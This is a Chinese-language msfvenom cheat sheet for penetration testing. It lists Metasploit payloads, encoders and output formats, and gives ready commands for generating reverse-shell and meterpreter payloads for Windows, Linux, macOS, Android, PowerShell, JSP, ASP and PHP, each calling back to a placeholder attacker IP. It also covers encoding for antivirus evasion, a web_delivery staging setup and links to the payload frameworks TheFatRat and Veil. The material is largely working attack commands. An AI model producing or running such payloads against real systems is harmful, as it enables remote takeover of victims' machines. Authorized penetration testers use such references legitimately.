msfvenom
msfvenom可用于生成正向或反向shell的payload,配合meterpreter使用进行渗透测试相当方便,不过在实际使用时,需要进行相应的免杀处理
-l, --list
语法:
payloads
由于很多,不一一列举
Framework Payloads (546 total) [--payload <value>]
==================================================
Name Description
---- -----------
windows/x64/meterpreter_bind_named_pipe
windows/x64/meterpreter_bind_tcp
windows/x64/meterpreter_reverse_http
windows/x64/meterpreter_reverse_https
windows/x64/meterpreter_reverse_ipv6_tcp
windows/x64/meterpreter_reverse_tcp
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
encoders
Framework Encoders [--encoder <value>]
======================================
Name Rank Description
---- ---- -----------
cmd/brace low Bash Brace Expansion Command Encoder
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Bourne ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
ruby/base64 great Ruby Base64 Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal Dynamic key XOR Encoder
nops
Framework NOPs (10 total)
=========================
Name Description
---- -----------
aarch64/simple Simple NOP generator
armle/simple Simple NOP generator
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator
platforms
Framework Platforms [--platform <value>]
========================================
Name
----
aix
android
apple_ios
bsd
bsdi
cisco
firefox
freebsd
hardware
hpux
irix
java
javascript
juniper
linux
mainframe
multi
netbsd
netware
nodejs
openbsd
osx
php
python
r
ruby
solaris
unifi
unix
unknown
windows
archs
Framework Architectures [--arch <value>]
========================================
Name
----
aarch64
armbe
armle
cbea
cbea64
cmd
dalvik
firefox
java
mips
mips64
mips64le
mipsbe
mipsle
nodejs
php
ppc
ppc64
ppc64le
ppce500v2
python
r
ruby
sparc
sparc64
tty
x64
x86
x86_64
zarch
encrypt
Framework Encryption Formats [--encrypt <value>]
================================================
Name
----
aes256
base64
rc4
xor
formats
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript
-o, --out
将payload保存到指定文件
-b, --bad-chars
指定bad-chars,比如:\x00\xff
-i, --iterations
指定编码次数
-s, --space
指定攻击载荷payload的最大长度
-k, --keep
payload自动分离并注入到新的进程中
-c, --add-code
指定一个win32 shellcode文件
-x, --template
指定一个可执行文件作为模板
--smallest
生成一个尽可能小的文件
常见的payload生成
windows
- x86
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe
- x64
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x64/xor -i 3 -f exe -o payload.exe
linux
- 32
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf
- 64
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=攻击机 LPORT=攻击机端口 -f elf -o payload.elf
mac
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho
android
//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk
powershell
payload不存在meterpreter版本
cmd/windows/powershell_bind_tcp
cmd/windows/powershell_reverse_tcp
cmd/windows/reverse_powershell
windows/powershell_bind_tcp
windows/powershell_reverse_tcp
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
采用msfvenom无法生成meterpreter版本的反弹shell,因此此处采用另一种方式,msf直接成meterpreter版本的反弹脚本:
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set LHOST 攻击机IP
msf5 exploit(multi/script/web_delivery) > set LPORT 攻击机端口
msf5 exploit(multi/script/web_delivery) > set target 2
此处target可选:
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 PSH (Binary)
最佳选择为:2-PSH
次选:3-Regsvr32(不过可能得到的shell权限不太够)
jsp
JSP只支持两种payload,无meterpreter版本
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp
asp/aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f asp -o payload.asp
php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
war
无meterpreter版本
nodejs
无meterpreter版本
python
perl
无meterpreter版本
ruby
无meterpreter版本
lua
windows shellcode
生成的shellcode需要手动进行编译
linux shellcode
mac shellcode
便捷化payload生成
项目地址:https://github.com/Screetsec/TheFatRat.git
项目地址:https://github.com/Veil-Framework/Veil